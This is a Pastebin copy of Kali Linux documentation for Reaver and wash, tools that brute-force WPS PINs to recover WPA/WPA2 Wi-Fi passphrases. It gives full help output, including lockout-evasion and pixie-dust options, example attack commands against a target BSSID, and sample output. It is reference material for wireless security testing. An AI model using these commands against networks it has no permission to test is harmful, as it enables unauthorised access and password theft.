Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [Linux]
- Reaver - Attack bruteforce Wifi Protected Setup (WPS)
- Reaver Package Description
- Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases, as described in http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf.
- Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
- On average Reaver will recover the target AP’s plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase
- Source: https://code.google.com/p/reaver-wps/
- Kali Reaver Repo: http://git.kali.org/gitweb/?p=packages/reaver.git;a=summary
- Author: Tactical Network Solutions, Craig Heffner, https://www.tacnetsol.com/
- License: GPLv2
- Tools included in the reaver package
- reaver – WiFi Protected Setup Attack Tool
- root@GithackTools618:~# reaver -h
- Reaver v1.6.4 WiFi Protected Setup Attack Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- Required Arguments:
- -i, --interface=<wlan> Name of the monitor-mode interface to use
- -b, --bssid=<mac> BSSID of the target AP
- Optional Arguments:
- -m, --mac=<mac> MAC of the host system
- -e, --essid=<ssid> ESSID of the target AP
- -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
- -o, --out-file=<file> Send output to a log file [stdout]
- -s, --session=<file> Restore a previous session file
- -C, --exec=<command> Execute the supplied command upon successful pin recovery
- -D, --daemonize Daemonize reaver
- -f, --fixed Disable channel hopping
- -5, --5ghz Use 5GHz 802.11 channels
- -v, --verbose Display non-critical warnings (-vv or -vvv for more)
- -q, --quiet Only display critical messages
- -h, --help Show help
- Advanced Options:
- -p, --pin=<wps pin> Use the specified pin (may be arbitrary string or 4/8 digit WPS pin)
- -d, --delay=<seconds> Set the delay between pin attempts [1]
- -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
- -g, --max-attempts=<num> Quit after num pin attempts
- -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
- -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
- -t, --timeout=<seconds> Set the receive timeout period [10]
- -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.40]
- -A, --no-associate Do not associate with the AP (association must be done by another application)
- -N, --no-nacks Do not send NACK messages when out of order packets are received
- -S, --dh-small Use small DH keys to improve crack speed
- -L, --ignore-locks Ignore locked state reported by the target AP
- -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
- -J, --timeout-is-nack Treat timeout as NACK (DIR-300/320)
- -w, --win7 Mimic a Windows 7 registrar [False]
- -K, --pixie-dust Run pixiedust attack
- -Z Run pixiedust attack
- Example:
- reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv
- wash – WiFi Protected Setup Scan Tool
- root@GithackTools618:~# wash -h
- Wash v1.6.4 WiFi Protected Setup Scan Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
- Required Arguments:
- -i, --interface=<iface> Interface to capture packets on
- -f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
- Optional Arguments:
- -c, --channel=<num> Channel to listen on [auto]
- -o, --out-file=<file> Write data to file
- -n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
- -D, --daemonize Daemonize wash
- -5, --5ghz Use 5GHz 802.11 channels
- -s, --scan Use scan mode
- -u, --survey Use survey mode [default]
- -a, --all Show all APs, even those without WPS
- -j, --json print extended WPS info as json
- -h, --help Show help
- Example:
- wash -i wlan0mon
- wash Usage Example
- Scan for networks using the monitor mode interface (-i mon0) on channel 6 (-c 6), while ignoring frame checksum errors (-C):
- root@kali:~# wash -i mon0 -c 6 -C
- Wash v1.4 WiFi Protected Setup Scan Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- BSSID Channel RSSI WPS Version WPS Locked ESSID
- ---------------------------------------------------------------------------------------------------------------
- E0:3F:49:6A:57:78 6 -73 1.0 No ASUS
- reaver Usage Example
- Use the monitor mode interface (-i mon0) to attack the access point (-b E0:3F:49:6A:57:78), displaying verbose output (-v):
- root@kali:~# reaver -i mon0 -b E0:3F:49:6A:57:78 -v
- Reaver v1.4 WiFi Protected Setup Attack Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- [+] Waiting for beacon from E0:3F:49:6A:57:78
- [+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS)
- [+] Trying pin 12345670
- Download reaver: https://code.google.com/p/reaver-wps/
Add Comment
Please, Sign In to add comment